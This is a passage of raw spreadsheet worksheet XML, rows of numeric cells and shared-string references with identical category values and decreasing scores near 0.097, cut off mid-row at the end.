      <c r="B32842" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C32842" s="2" t="s">
        <v>31614</v>
      </c>
      <c r="D32842" s="2">
        <v>1.0</v>
      </c>
      <c r="E32842" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32842" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32843" ht="15.75" customHeight="1">
      <c r="A32843" s="1">
        <v>25261.0</v>
      </c>
      <c r="B32843" s="2">
        <v>1.3388906E7</v>
      </c>
      <c r="C32843" s="2" t="s">
        <v>31615</v>
      </c>
      <c r="D32843" s="2">
        <v>1.0</v>
      </c>
      <c r="E32843" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32843" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32844" ht="15.75" customHeight="1">
      <c r="A32844" s="1">
        <v>25547.0</v>
      </c>
      <c r="B32844" s="2">
        <v>1.427743E7</v>
      </c>
      <c r="C32844" s="2" t="s">
        <v>31616</v>
      </c>
      <c r="D32844" s="2">
        <v>1.0</v>
      </c>
      <c r="E32844" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32844" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32845" ht="15.75" customHeight="1">
      <c r="A32845" s="1">
        <v>25623.0</v>
      </c>
      <c r="B32845" s="2">
        <v>1.4445943E7</v>
      </c>
      <c r="C32845" s="2" t="s">
        <v>31617</v>
      </c>
      <c r="D32845" s="2">
        <v>1.0</v>
      </c>
      <c r="E32845" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32845" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32846" ht="15.75" customHeight="1">
      <c r="A32846" s="1">
        <v>25904.0</v>
      </c>
      <c r="B32846" s="2">
        <v>1.5067082E7</v>
      </c>
      <c r="C32846" s="2" t="s">
        <v>31618</v>
      </c>
      <c r="D32846" s="2">
        <v>1.0</v>
      </c>
      <c r="E32846" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32846" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32847" ht="15.75" customHeight="1">
      <c r="A32847" s="1">
        <v>25922.0</v>
      </c>
      <c r="B32847" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C32847" s="2" t="s">
        <v>31619</v>
      </c>
      <c r="D32847" s="2">
        <v>1.0</v>
      </c>
      <c r="E32847" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32847" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32848" ht="15.75" customHeight="1">
      <c r="A32848" s="1">
        <v>25973.0</v>
      </c>
      <c r="B32848" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C32848" s="2" t="s">
        <v>31620</v>
      </c>
      <c r="D32848" s="2">
        <v>1.0</v>
      </c>
      <c r="E32848" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32848" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32849" ht="15.75" customHeight="1">
      <c r="A32849" s="1">
        <v>26479.0</v>
      </c>
      <c r="B32849" s="2">
        <v>1.7442472E7</v>
      </c>
      <c r="C32849" s="2" t="s">
        <v>31621</v>
      </c>
      <c r="D32849" s="2">
        <v>1.0</v>
      </c>
      <c r="E32849" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32849" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32850" ht="15.75" customHeight="1">
      <c r="A32850" s="1">
        <v>26527.0</v>
      </c>
      <c r="B32850" s="2">
        <v>1.7695162E7</v>
      </c>
      <c r="C32850" s="2" t="s">
        <v>31622</v>
      </c>
      <c r="D32850" s="2">
        <v>1.0</v>
      </c>
      <c r="E32850" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32850" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32851" ht="15.75" customHeight="1">
      <c r="A32851" s="1">
        <v>26706.0</v>
      </c>
      <c r="B32851" s="2">
        <v>1.818536E7</v>
      </c>
      <c r="C32851" s="2" t="s">
        <v>31623</v>
      </c>
      <c r="D32851" s="2">
        <v>1.0</v>
      </c>
      <c r="E32851" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32851" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32852" ht="15.75" customHeight="1">
      <c r="A32852" s="1">
        <v>26845.0</v>
      </c>
      <c r="B32852" s="2">
        <v>1.9009347E7</v>
      </c>
      <c r="C32852" s="2" t="s">
        <v>31624</v>
      </c>
      <c r="D32852" s="2">
        <v>1.0</v>
      </c>
      <c r="E32852" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32852" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32853" ht="15.75" customHeight="1">
      <c r="A32853" s="1">
        <v>26971.0</v>
      </c>
      <c r="B32853" s="2">
        <v>1.9650971E7</v>
      </c>
      <c r="C32853" s="2" t="s">
        <v>31625</v>
      </c>
      <c r="D32853" s="2">
        <v>1.0</v>
      </c>
      <c r="E32853" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32853" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32854" ht="15.75" customHeight="1">
      <c r="A32854" s="1">
        <v>27007.0</v>
      </c>
      <c r="B32854" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C32854" s="2" t="s">
        <v>31626</v>
      </c>
      <c r="D32854" s="2">
        <v>1.0</v>
      </c>
      <c r="E32854" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32854" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32855" ht="15.75" customHeight="1">
      <c r="A32855" s="1">
        <v>27102.0</v>
      </c>
      <c r="B32855" s="2">
        <v>2.0547628E7</v>
      </c>
      <c r="C32855" s="2" t="s">
        <v>31627</v>
      </c>
      <c r="D32855" s="2">
        <v>1.0</v>
      </c>
      <c r="E32855" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32855" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32856" ht="15.75" customHeight="1">
      <c r="A32856" s="1">
        <v>27171.0</v>
      </c>
      <c r="B32856" s="2">
        <v>2.0852327E7</v>
      </c>
      <c r="C32856" s="2" t="s">
        <v>31628</v>
      </c>
      <c r="D32856" s="2">
        <v>1.0</v>
      </c>
      <c r="E32856" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32856" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32857" ht="15.75" customHeight="1">
      <c r="A32857" s="1">
        <v>27483.0</v>
      </c>
      <c r="B32857" s="2">
        <v>2.2032451E7</v>
      </c>
      <c r="C32857" s="2" t="s">
        <v>31629</v>
      </c>
      <c r="D32857" s="2">
        <v>1.0</v>
      </c>
      <c r="E32857" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32857" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32858" ht="15.75" customHeight="1">
      <c r="A32858" s="1">
        <v>27575.0</v>
      </c>
      <c r="B32858" s="2">
        <v>2.2447704E7</v>
      </c>
      <c r="C32858" s="2" t="s">
        <v>31630</v>
      </c>
      <c r="D32858" s="2">
        <v>1.0</v>
      </c>
      <c r="E32858" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32858" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32859" ht="15.75" customHeight="1">
      <c r="A32859" s="1">
        <v>27658.0</v>
      </c>
      <c r="B32859" s="2">
        <v>2.286279E7</v>
      </c>
      <c r="C32859" s="2" t="s">
        <v>31631</v>
      </c>
      <c r="D32859" s="2">
        <v>1.0</v>
      </c>
      <c r="E32859" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32859" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32860" ht="15.75" customHeight="1">
      <c r="A32860" s="1">
        <v>27710.0</v>
      </c>
      <c r="B32860" s="2">
        <v>2.3043535E7</v>
      </c>
      <c r="C32860" s="2" t="s">
        <v>31632</v>
      </c>
      <c r="D32860" s="2">
        <v>1.0</v>
      </c>
      <c r="E32860" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32860" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32861" ht="15.75" customHeight="1">
      <c r="A32861" s="1">
        <v>27820.0</v>
      </c>
      <c r="B32861" s="2">
        <v>2.3365037E7</v>
      </c>
      <c r="C32861" s="2" t="s">
        <v>31633</v>
      </c>
      <c r="D32861" s="2">
        <v>1.0</v>
      </c>
      <c r="E32861" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32861" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32862" ht="15.75" customHeight="1">
      <c r="A32862" s="1">
        <v>28106.0</v>
      </c>
      <c r="B32862" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C32862" s="2" t="s">
        <v>31634</v>
      </c>
      <c r="D32862" s="2">
        <v>1.0</v>
      </c>
      <c r="E32862" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32862" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32863" ht="15.75" customHeight="1">
      <c r="A32863" s="1">
        <v>28162.0</v>
      </c>
      <c r="B32863" s="2">
        <v>2.4919634E7</v>
      </c>
      <c r="C32863" s="2" t="s">
        <v>31635</v>
      </c>
      <c r="D32863" s="2">
        <v>1.0</v>
      </c>
      <c r="E32863" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32863" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32864" ht="15.75" customHeight="1">
      <c r="A32864" s="1">
        <v>28193.0</v>
      </c>
      <c r="B32864" s="2">
        <v>2.500689E7</v>
      </c>
      <c r="C32864" s="2" t="s">
        <v>31636</v>
      </c>
      <c r="D32864" s="2">
        <v>1.0</v>
      </c>
      <c r="E32864" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32864" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32865" ht="15.75" customHeight="1">
      <c r="A32865" s="1">
        <v>28282.0</v>
      </c>
      <c r="B32865" s="2">
        <v>2.5483059E7</v>
      </c>
      <c r="C32865" s="2" t="s">
        <v>31595</v>
      </c>
      <c r="D32865" s="2">
        <v>1.0</v>
      </c>
      <c r="E32865" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32865" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32866" ht="15.75" customHeight="1">
      <c r="A32866" s="1">
        <v>29117.0</v>
      </c>
      <c r="B32866" s="2">
        <v>3.0440211E7</v>
      </c>
      <c r="C32866" s="2" t="s">
        <v>31637</v>
      </c>
      <c r="D32866" s="2">
        <v>1.0</v>
      </c>
      <c r="E32866" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32866" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32867" ht="15.75" customHeight="1">
      <c r="A32867" s="1">
        <v>29124.0</v>
      </c>
      <c r="B32867" s="2">
        <v>3.0498936E7</v>
      </c>
      <c r="C32867" s="2" t="s">
        <v>31638</v>
      </c>
      <c r="D32867" s="2">
        <v>1.0</v>
      </c>
      <c r="E32867" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32867" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32868" ht="15.75" customHeight="1">
      <c r="A32868" s="1">
        <v>29791.0</v>
      </c>
      <c r="B32868" s="2">
        <v>3.5053145E7</v>
      </c>
      <c r="C32868" s="2" t="s">
        <v>31597</v>
      </c>
      <c r="D32868" s="2">
        <v>1.0</v>
      </c>
      <c r="E32868" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32868" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32869" ht="15.75" customHeight="1">
      <c r="A32869" s="1">
        <v>30030.0</v>
      </c>
      <c r="B32869" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C32869" s="2" t="s">
        <v>31639</v>
      </c>
      <c r="D32869" s="2">
        <v>1.0</v>
      </c>
      <c r="E32869" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32869" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32870" ht="15.75" customHeight="1">
      <c r="A32870" s="1">
        <v>30497.0</v>
      </c>
      <c r="B32870" s="2">
        <v>3.9971722E7</v>
      </c>
      <c r="C32870" s="2" t="s">
        <v>31640</v>
      </c>
      <c r="D32870" s="2">
        <v>1.0</v>
      </c>
      <c r="E32870" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32870" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32871" ht="15.75" customHeight="1">
      <c r="A32871" s="1">
        <v>30595.0</v>
      </c>
      <c r="B32871" s="2">
        <v>4.1291679E7</v>
      </c>
      <c r="C32871" s="2" t="s">
        <v>31641</v>
      </c>
      <c r="D32871" s="2">
        <v>1.0</v>
      </c>
      <c r="E32871" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32871" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32872" ht="15.75" customHeight="1">
      <c r="A32872" s="1">
        <v>30661.0</v>
      </c>
      <c r="B32872" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C32872" s="2" t="s">
        <v>31642</v>
      </c>
      <c r="D32872" s="2">
        <v>1.0</v>
      </c>
      <c r="E32872" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32872" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32873" ht="15.75" customHeight="1">
      <c r="A32873" s="1">
        <v>30785.0</v>
      </c>
      <c r="B32873" s="2">
        <v>4.482202E7</v>
      </c>
      <c r="C32873" s="2" t="s">
        <v>31643</v>
      </c>
      <c r="D32873" s="2">
        <v>1.0</v>
      </c>
      <c r="E32873" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32873" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32874" ht="15.75" customHeight="1">
      <c r="A32874" s="1">
        <v>30921.0</v>
      </c>
      <c r="B32874" s="2">
        <v>4.6901495E7</v>
      </c>
      <c r="C32874" s="2" t="s">
        <v>31644</v>
      </c>
      <c r="D32874" s="2">
        <v>1.0</v>
      </c>
      <c r="E32874" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32874" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32875" ht="15.75" customHeight="1">
      <c r="A32875" s="1">
        <v>31308.0</v>
      </c>
      <c r="B32875" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C32875" s="2" t="s">
        <v>31645</v>
      </c>
      <c r="D32875" s="2">
        <v>1.0</v>
      </c>
      <c r="E32875" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32875" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32876" ht="15.75" customHeight="1">
      <c r="A32876" s="1">
        <v>31566.0</v>
      </c>
      <c r="B32876" s="2">
        <v>5122535.0</v>
      </c>
      <c r="C32876" s="2" t="s">
        <v>31646</v>
      </c>
      <c r="D32876" s="2">
        <v>1.0</v>
      </c>
      <c r="E32876" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32876" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32877" ht="15.75" customHeight="1">
      <c r="A32877" s="1">
        <v>31625.0</v>
      </c>
      <c r="B32877" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C32877" s="2" t="s">
        <v>31647</v>
      </c>
      <c r="D32877" s="2">
        <v>1.0</v>
      </c>
      <c r="E32877" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32877" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32878" ht="15.75" customHeight="1">
      <c r="A32878" s="1">
        <v>31847.0</v>
      </c>
      <c r="B32878" s="2">
        <v>5274287.0</v>
      </c>
      <c r="C32878" s="2" t="s">
        <v>31648</v>
      </c>
      <c r="D32878" s="2">
        <v>1.0</v>
      </c>
      <c r="E32878" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32878" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32879" ht="15.75" customHeight="1">
      <c r="A32879" s="1">
        <v>32030.0</v>
      </c>
      <c r="B32879" s="2">
        <v>5361041.0</v>
      </c>
      <c r="C32879" s="2" t="s">
        <v>31649</v>
      </c>
      <c r="D32879" s="2">
        <v>1.0</v>
      </c>
      <c r="E32879" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32879" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32880" ht="15.75" customHeight="1">
      <c r="A32880" s="1">
        <v>32145.0</v>
      </c>
      <c r="B32880" s="2">
        <v>5423428.0</v>
      </c>
      <c r="C32880" s="2" t="s">
        <v>31650</v>
      </c>
      <c r="D32880" s="2">
        <v>1.0</v>
      </c>
      <c r="E32880" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32880" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32881" ht="15.75" customHeight="1">
      <c r="A32881" s="1">
        <v>32258.0</v>
      </c>
      <c r="B32881" s="2">
        <v>5.5099953E7</v>
      </c>
      <c r="C32881" s="2" t="s">
        <v>31651</v>
      </c>
      <c r="D32881" s="2">
        <v>1.0</v>
      </c>
      <c r="E32881" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32881" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32882" ht="15.75" customHeight="1">
      <c r="A32882" s="1">
        <v>32858.0</v>
      </c>
      <c r="B32882" s="2">
        <v>6270549.0</v>
      </c>
      <c r="C32882" s="2" t="s">
        <v>31652</v>
      </c>
      <c r="D32882" s="2">
        <v>1.0</v>
      </c>
      <c r="E32882" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32882" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32883" ht="15.75" customHeight="1">
      <c r="A32883" s="1">
        <v>33169.0</v>
      </c>
      <c r="B32883" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C32883" s="2" t="s">
        <v>31647</v>
      </c>
      <c r="D32883" s="2">
        <v>1.0</v>
      </c>
      <c r="E32883" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32883" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32884" ht="15.75" customHeight="1">
      <c r="A32884" s="1">
        <v>33187.0</v>
      </c>
      <c r="B32884" s="2">
        <v>7125506.0</v>
      </c>
      <c r="C32884" s="2" t="s">
        <v>31603</v>
      </c>
      <c r="D32884" s="2">
        <v>1.0</v>
      </c>
      <c r="E32884" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32884" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32885" ht="15.75" customHeight="1">
      <c r="A32885" s="1">
        <v>33568.0</v>
      </c>
      <c r="B32885" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C32885" s="2" t="s">
        <v>31653</v>
      </c>
      <c r="D32885" s="2">
        <v>1.0</v>
      </c>
      <c r="E32885" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32885" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32886" ht="15.75" customHeight="1">
      <c r="A32886" s="1">
        <v>33581.0</v>
      </c>
      <c r="B32886" s="2">
        <v>8301987.0</v>
      </c>
      <c r="C32886" s="2" t="s">
        <v>31654</v>
      </c>
      <c r="D32886" s="2">
        <v>1.0</v>
      </c>
      <c r="E32886" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32886" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32887" ht="15.75" customHeight="1">
      <c r="A32887" s="1">
        <v>33627.0</v>
      </c>
      <c r="B32887" s="2">
        <v>8356081.0</v>
      </c>
      <c r="C32887" s="2" t="s">
        <v>31655</v>
      </c>
      <c r="D32887" s="2">
        <v>1.0</v>
      </c>
      <c r="E32887" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32887" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32888" ht="15.75" customHeight="1">
      <c r="A32888" s="1">
        <v>34047.0</v>
      </c>
      <c r="B32888" s="2">
        <v>9577485.0</v>
      </c>
      <c r="C32888" s="2" t="s">
        <v>31656</v>
      </c>
      <c r="D32888" s="2">
        <v>1.0</v>
      </c>
      <c r="E32888" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32888" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32889" ht="15.75" customHeight="1">
      <c r="A32889" s="1">
        <v>34213.0</v>
      </c>
      <c r="B32889" s="2">
        <v>2.9508583E7</v>
      </c>
      <c r="C32889" s="2" t="s">
        <v>31657</v>
      </c>
      <c r="D32889" s="2">
        <v>1.0</v>
      </c>
      <c r="E32889" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32889" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32890" ht="15.75" customHeight="1">
      <c r="A32890" s="1">
        <v>3646.0</v>
      </c>
      <c r="B32890" s="2">
        <v>3.9283139E7</v>
      </c>
      <c r="C32890" s="2" t="s">
        <v>31658</v>
      </c>
      <c r="D32890" s="2">
        <v>1.0</v>
      </c>
      <c r="E32890" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32890" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="32891" ht="15.75" customHeight="1">
      <c r="A32891" s="1">
        <v>3747.0</v>
      </c>
      <c r="B32891" s="2">
        <v>3.9693649E7</v>
      </c>
      <c r="C32891" s="2" t="s">
        <v>31659</v>
      </c>
      <c r="D32891" s="2">
        <v>1.0</v>
      </c>
      <c r="E32891" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32891" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="32892" ht="15.75" customHeight="1">
      <c r="A32892" s="1">
        <v>19921.0</v>
      </c>
      <c r="B32892" s="2">
        <v>5.7421196E7</v>
      </c>
      <c r="C32892" s="2" t="s">
        <v>31660</v>
      </c>
      <c r="D32892" s="2">
        <v>1.0</v>
      </c>
      <c r="E32892" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32892" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="32893" ht="15.75" customHeight="1">
      <c r="A32893" s="1">
        <v>1074.0</v>
      </c>
      <c r="B32893" s="2">
        <v>2.3589116E7</v>
      </c>
      <c r="C32893" s="2" t="s">
        <v>31661</v>
      </c>
      <c r="D32893" s="2">
        <v>1.0</v>
      </c>
      <c r="E32893" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32893" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32894" ht="15.75" customHeight="1">
      <c r="A32894" s="1">
        <v>4156.0</v>
      </c>
      <c r="B32894" s="2">
        <v>4.1483574E7</v>
      </c>
      <c r="C32894" s="2" t="s">
        <v>31662</v>
      </c>
      <c r="D32894" s="2">
        <v>1.0</v>
      </c>
      <c r="E32894" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32894" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32895" ht="15.75" customHeight="1">
      <c r="A32895" s="1">
        <v>8578.0</v>
      </c>
      <c r="B32895" s="2">
        <v>5.4212289E7</v>
      </c>
      <c r="C32895" s="2" t="s">
        <v>31663</v>
      </c>
      <c r="D32895" s="2">
        <v>1.0</v>
      </c>
      <c r="E32895" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32895" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32896" ht="15.75" customHeight="1">
      <c r="A32896" s="1">
        <v>8752.0</v>
      </c>
      <c r="B32896" s="2">
        <v>5.4550051E7</v>
      </c>
      <c r="C32896" s="2" t="s">
        <v>31664</v>
      </c>
      <c r="D32896" s="2">
        <v>1.0</v>
      </c>
      <c r="E32896" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32896" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32897" ht="15.75" customHeight="1">
      <c r="A32897" s="1">
        <v>14683.0</v>
      </c>
      <c r="B32897" s="2">
        <v>4.0503516E7</v>
      </c>
      <c r="C32897" s="2" t="s">
        <v>31665</v>
      </c>
      <c r="D32897" s="2">
        <v>1.0</v>
      </c>
      <c r="E32897" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32897" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32898" ht="15.75" customHeight="1">
      <c r="A32898" s="1">
        <v>15052.0</v>
      </c>
      <c r="B32898" s="2">
        <v>4.1645861E7</v>
      </c>
      <c r="C32898" s="2" t="s">
        <v>31666</v>
      </c>
      <c r="D32898" s="2">
        <v>1.0</v>
      </c>
      <c r="E32898" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32898" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32899" ht="15.75" customHeight="1">
      <c r="A32899" s="1">
        <v>16430.0</v>
      </c>
      <c r="B32899" s="2">
        <v>4.6335716E7</v>
      </c>
      <c r="C32899" s="2" t="s">
        <v>31667</v>
      </c>
      <c r="D32899" s="2">
        <v>1.0</v>
      </c>
      <c r="E32899" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32899" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32900" ht="15.75" customHeight="1">
      <c r="A32900" s="1">
        <v>16484.0</v>
      </c>
      <c r="B32900" s="2">
        <v>4.652834E7</v>
      </c>
      <c r="C32900" s="2" t="s">
        <v>31668</v>
      </c>
      <c r="D32900" s="2">
        <v>1.0</v>
      </c>
      <c r="E32900" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32900" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="32901" ht="15.75" customHeight="1">
      <c r="A32901" s="1">
        <v>498.0</v>
      </c>
      <c r="B32901" s="2">
        <v>1.7830333E7</v>
      </c>
      <c r="C32901" s="2" t="s">
        <v>31669</v>
      </c>
      <c r="D32901" s="2">
        <v>1.0</v>
      </c>
      <c r="E32901" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32901" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="32902" ht="15.75" customHeight="1">
      <c r="A32902" s="1">
        <v>1589.0</v>
      </c>
      <c r="B32902" s="2">
        <v>2.7736273E7</v>
      </c>
      <c r="C32902" s="2" t="s">
        <v>31670</v>
      </c>
      <c r="D32902" s="2">
        <v>1.0</v>
      </c>
      <c r="E32902" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32902" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="32903" ht="15.75" customHeight="1">
      <c r="A32903" s="1">
        <v>1929.0</v>
      </c>
      <c r="B32903" s="2">
        <v>3.0134515E7</v>
      </c>
      <c r="C32903" s="2" t="s">
        <v>31671</v>
      </c>
      <c r="D32903" s="2">
        <v>1.0</v>
      </c>
      <c r="E32903" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32903" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="32904" ht="15.75" customHeight="1">
      <c r="A32904" s="1">
        <v>8679.0</v>
      </c>
      <c r="B32904" s="2">
        <v>5.4391482E7</v>
      </c>
      <c r="C32904" s="2" t="s">
        <v>31672</v>
      </c>
      <c r="D32904" s="2">
        <v>1.0</v>
      </c>
      <c r="E32904" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32904" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="32905" ht="15.75" customHeight="1">
      <c r="A32905" s="1">
        <v>15763.0</v>
      </c>
      <c r="B32905" s="2">
        <v>4.4172142E7</v>
      </c>
      <c r="C32905" s="2" t="s">
        <v>31673</v>
      </c>
      <c r="D32905" s="2">
        <v>1.0</v>
      </c>
      <c r="E32905" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32905" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="32906" ht="15.75" customHeight="1">
      <c r="A32906" s="1">
        <v>6341.0</v>
      </c>
      <c r="B32906" s="2">
        <v>4.8306299E7</v>
      </c>
      <c r="C32906" s="2" t="s">
        <v>31674</v>
      </c>
      <c r="D32906" s="2">
        <v>1.0</v>
      </c>
      <c r="E32906" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32906" s="2">
        <v>0.09649122807017546</v>
      </c>
    </row>
    <row r="32907" ht="15.75" customHeight="1">
      <c r="A32907" s="1">
        <v>12204.0</v>
      </c>
      <c r="B32907" s="2">
        <v>2.7500534E7</v>
      </c>
      <c r="C32907" s="2" t="s">
        <v>31675</v>
      </c>
      <c r="D32907" s="2">
        <v>1.0</v>
      </c>
      <c r="E32907" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32907" s="2">
        <v>0.09649122807017545</v>
      </c>
    </row>
    <row r="32908" ht="15.75" customHeight="1">
      <c r="A32908" s="1">
        <v>6785.0</v>
      </c>
      <c r="B32908" s="2">
        <v>4.9491977E7</v>
      </c>
      <c r="C32908" s="2" t="s">
        <v>31676</v>
      </c>
      <c r="D32908" s="2">
        <v>1.0</v>
      </c>
      <c r="E32908" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32908" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="32909" ht="15.75" customHeight="1">
      <c r="A32909" s="1">
        <v>16818.0</v>
      </c>
      <c r="B32909" s="2">
